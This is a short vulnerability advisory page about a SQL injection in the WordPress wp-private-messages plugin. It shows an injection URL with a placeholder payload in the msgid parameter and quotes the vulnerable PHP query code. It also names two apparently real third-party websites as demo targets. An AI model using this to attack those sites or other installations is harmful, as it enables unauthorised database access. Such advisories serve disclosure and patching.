WordPress wp-private-messages SQL Injection

2013.07.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability. ################################# # Iranian Exploit DataBase # Www.exploit.IrIsT.Ir ################################# # Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://exploit.IrIsT.Ir # Software Link : http://wordpress.org/plugins/wp-private-messages/ # Security Risk : High # Tested on : Linux ################################# # Exploit : # http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] # Dem0 : # http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] # http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] ################################# # Vuln Source C0de : # Lin 145 : # $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC"); # And Lin 160 : # echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>"; ################################# # Exploit Archive : http://exploit.irist.ir/exploits-148.html #################################

References:

http://exploit.irist.ir/exploits-148.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top